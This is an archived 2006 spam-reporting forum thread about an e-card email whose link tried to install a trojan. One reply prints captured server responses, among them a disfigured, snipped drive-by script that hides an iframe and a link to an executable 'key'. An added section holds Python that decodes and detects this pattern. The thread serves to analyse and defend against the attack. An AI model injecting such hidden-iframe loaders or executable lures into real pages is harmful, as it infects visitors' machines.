dra007 Posted January 23, 2006

This is interesting, I wonder why they are getting so desperate: the link in this spam pointed to a website that attempted to send a trojan, fortunately blocked by my antivirus program. The link pretended to be a postcard but otherwise seemed quite innocuous: http://www.spamcop.net/sc?id=z862838668ze0...e0f4d044bc5de1z
mshalperin Posted January 23, 2006

> This is interesting, I wonder why they are getting so desperate: the link in this spam pointed to a website that attempted to send a trojan,

Why did you try the link?
dra007 (Author) Posted January 23, 2006

> Why did you try the link?

Curiosity killed the cat?
mshalperin Posted January 23, 2006

> Curiosity killed the cat?

8 more to go.
dra007 (Author) Posted January 23, 2006

Since I stopped counting, am I a zombie?
dra007 (Author) Posted January 23, 2006

On a more serious note, I was hoping some savvy geek here would have some insight into this.
Wazoo Posted January 24, 2006

dead page .. URLs broken in the below;

01/23/06 18:11:19 Browsing http:// www.bertschphotography.com/ PhotoGallery/postcard/
Fetching http:// www.bertschphotography.com/ PhotoGallery/postcard/ ...
GET /PhotoGallery/postcard/ HTTP/1.1
Host: www. bertschphotography.com
Connection: close
User-Agent: Sam Spade 1.14

HTTP/1.1 302 Found
Date: Tue, 24 Jan 2006 00:11:24 GMT
Server: Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.11 mod_ssl/2.8.25 OpenSSL/0.9.7a
Location: http://server2.hostbuilder.com/suspended.page/
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://server2.hostbuilder.com/suspended.page/">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.34 Server at www.bertschphotography.com Port 80</ADDRESS>
</BODY></HTML>

dead page, URLs broken in the below;

01/23/06 18:14:54 Browsing http://www .euro-grafic.com/immagini/postcard/
Fetching http://www. euro-grafic.com/immagini/postcard/ ...
GET /immagini/postcard/ HTTP/1.1
Host: www. euro-grafic.com
Connection: close
User-Agent: Sam Spade 1.14

HTTP/1.1 503 Service Temporarily Unavailable
Date: Tue, 24 Jan 2006 00:11:21 GMT
Server: Apache/2.0.50 (Fedora)
Content-Length: 410
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.</p>
<hr />
<address>Apache/2.0.50 (Fedora) Server at www. euro-grafic.com Port 80</address>
</body></html>

Here's your code, URLs broken in the below, and of course, code disfigured;

01/23/06 18:17:24 Browsing http://www. andsoitbegins.co.uk/acatalog/postcard/
Fetching http://www.a ndsoitbegins.co.uk/acatalog/postcard/ ...
GET /acatalog/postcard/ HTTP/1.1
Host: www. andsoitbegins.co.uk
Connection: close
User-Agent: Sam Spade 1.14

HTTP/1.1 200 OK
Date: Tue, 24 Jan 2006 00:17:30 GMT
Server: Apache/1.3.29 (Unix) mod_jk/1.2.2 Sun-ONE-ASP/4.0.0 FrontPage/5.0.2.2623 mod_python/2.7.8 Python/1.5.2 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 mod_webapp/1.2.0-dev
X-Powered-By: PHP/4.1.2
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<s cr ipt lang uage=jav ascr ipt>docu ment.wr ite(une scape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%<snip>67%68%74%3d%22%31%22%20%77%69%64%74%68%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e'))</scr ipt>
<!-- saved from url=(0062)http://www. bookandhost.com/us-hosting/order.asp?plan=10mblinux -->
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META http-equiv=Content-Type content="text/html; charset=Windows-1252">
<CSS stuff deleted>
<META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>
<BODY>
<p>Loading...</p>
<p>Please wait</p>
<p>If not supported download this private <a href="keys/postkey.exe">key</a></p>
</BODY></HTML>

A user running insecurely would only see the "page not found" message, not knowing that the JavaScript-enabled browser has already downloaded and executed the code .... Let's not even try to discuss the mindset of some actually clicking on the "download this file" link .... geeze .... No idea what you really want to hear besides the obvious ... unsolicited e-mail from an unknown source, including three different links to the "same" ecard (?) .. on and on .... back to that only the ignorant would follow the links provided in an e-mail like this, and yet, we all know that there are millions of those types out there .... By the way, this is far from "new" ......
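The obfuscated script in Wazoo's third capture is the classic document.write(unescape('%3c%69%66%72%61%6d%65...')) pattern: the percent-encoded string decodes to an iframe tag, and the trailing bytes in the capture decode to height="1" width="1", i.e. a one-pixel frame the visitor never sees. The following is an added example, not code from the thread, showing how a defender can decode that pattern offline from a saved page (the way Sam Spade fetched it, without a browser executing anything) and flag hidden iframes and links to executables such as the "postkey.exe" one above. The sample page, the 192.0.2.10 address (an RFC 5737 documentation range, standing in for the snipped real host) and all function names are constructed for this example.

```python
import re

# Constructed sample page modelled on the capture in the thread above. The real
# hex payload there is snipped, so this one is built locally: a 1x1 iframe whose
# src is an RFC 5737 documentation address (a placeholder, not a real host).
HIDDEN_IFRAME = '<iframe src="http://192.0.2.10/example-payload/" height="1" width="1"></iframe>'


def js_escape(text):
    """Mimic JavaScript escape() for ASCII input: every character becomes %XX."""
    return "".join("%%%02x" % ord(c) for c in text)


ENCODED = js_escape(HIDDEN_IFRAME)

SAMPLE_HTML = (
    "<script language=javascript>document.write(unescape('" + ENCODED + "'))</script>\n"
    "<HTML><HEAD><TITLE>The page cannot be found</TITLE></HEAD><BODY>\n"
    "<p>Loading...</p><p>Please wait</p>\n"
    '<p>If not supported download this private <a href="keys/postkey.exe">key</a></p>\n'
    "</BODY></HTML>\n"
)

# JavaScript unescape() understands both %XX and %uXXXX sequences.
_ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
# document.write(unescape('...')) with either quote style, whitespace tolerant.
SCRIPT_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Links whose target has an executable extension (the "download this private key" trick).
EXEC_LINK_RE = re.compile(r"""href\s*=\s*["']?([^"'\s>]+\.(?:exe|scr|pif|com|bat|cmd))""", re.I)


def js_unescape(text):
    """Decode a JavaScript escape()-encoded string back to text."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def _parse_attrs(attr_text):
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        name = m.group(1).lower()
        attrs[name] = next(g for g in m.groups()[1:] if g is not None)
    return attrs


def _dim(value):
    """Leading integer of a width/height attribute, or None if absent/non-numeric."""
    m = re.match(r"\d+", value or "")
    return int(m.group()) if m else None


def find_hidden_iframes(html):
    """Return (origin, src, width, height) for every iframe of at most 1x1 pixels,
    scanning both the raw markup and the output of document.write(unescape(...))."""
    sources = [("inline", html)]
    for m in SCRIPT_RE.finditer(html):
        sources.append(("unescape", js_unescape(m.group(2))))
    found = []
    for origin, markup in sources:
        for fm in IFRAME_RE.finditer(markup):
            attrs = _parse_attrs(fm.group(1))
            w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
            if w is not None and h is not None and w <= 1 and h <= 1:
                found.append((origin, attrs.get("src", ""), w, h))
    return found


def find_executable_links(html):
    """Return href targets that point straight at an executable file."""
    return EXEC_LINK_RE.findall(html)


if __name__ == "__main__":
    for origin, src, w, h in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe (%s, %dx%d): %s" % (origin, w, h, src))
    for href in find_executable_links(SAMPLE_HTML):
        print("executable link:", href)
```

Run against a page saved from a raw fetch rather than from a browser, since a browser would already have executed the script; a decoded iframe with a foreign host is the thing to report to the host's abuse contact, not to visit.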
dra007 (Author) Posted January 24, 2006

Thanks Wazoo. Not that this was run-of-the-mill spam. It did not sell anything, just announced an e-card... Something like you get from friends around holidays. Of course, my initial instinct was to ignore the bait and just report it, and that is what I did. ... it was after I trashed that e-mail that I went back to it .. The question remains, why would someone bait you with an innocent-looking e-card just to infect your machine with a trojan? And now it looks like the site was taken down...

> By the way, this is far from "new" ......

My luck, it was new to me...
StevenUnderwood Posted January 24, 2006

> The question remains, why would someone bait you with an innocent looking e-card just to infect your machine with a trojan?

Virus writers will use any trick to get people to run their programs, which most recently open holes in your system, allowing them control of your systems so you can help them send their spam or more virus attempts.
Wazoo Posted January 24, 2006

> The question remains, why would someone bait you with an innocent looking e-card just to infect your machine with a trojan?

I'll offer a link in a bit. The background was that I spent almost 12 hours (from start to finish, though not totally dedicated to this specific work .. tons of time doing other stuff while waiting for scans to finish, a defrag or two, etc.) .... This was being done remotely via a VNC tool on a system about 70 miles north of me ... As time went on, getting rather perturbed that something was going on that just wasn't quite making itself visible to me. As you may have noticed, I hate it when that happens. Bottom line, I did in fact get that system cleaned up and running smooth again. Trying to say exactly what I did and what the magic step may have been, I'll never know .. way too many penciled notes, my own system froze up a time or two with all the research going on, notepad instances with snippets from here and there, documenting things seen, things done, etc. ... and of course, a lot of that data gone when having to do that forced reboot .... it was a week or so later that this web page appeared .. thankfully I hadn't read it before I blew a day on an infected system, else I'd have known it was impossible to remove <g> As I recollect, Adaware's VX2 tool didn't show up until a bit later. As I can't define which steps managed to actually identify the files involved (that kept rewriting new ones with new names every time the computer rebooted), I'll just state that it's nice that there are much smarter folks out there in the world, just wish the reaction time was a bit quicker sometimes <g>

Anyway, I believe your answer is pretty well addressed in this following 'story' ... got to give the guy a lot of credit for doing this kind of research ..... http://tacit.livejournal.com/125748.html

I'd swear I put this up somewhere in here before .... seems like I would have tossed it into the FAQ ...???? Ha!! I did ... under the Other Places section: "Follow the Money; or, why does my computer keep getting infested with spyware?"
dra007 (Author) Posted January 24, 2006

Good story, thanks Wazoo, very instructive. Since most e-mails I get are from spammers, I will have to assume this one too was sent by someone with connections to the spammers' lists.
This topic is now archived and is closed to further replies.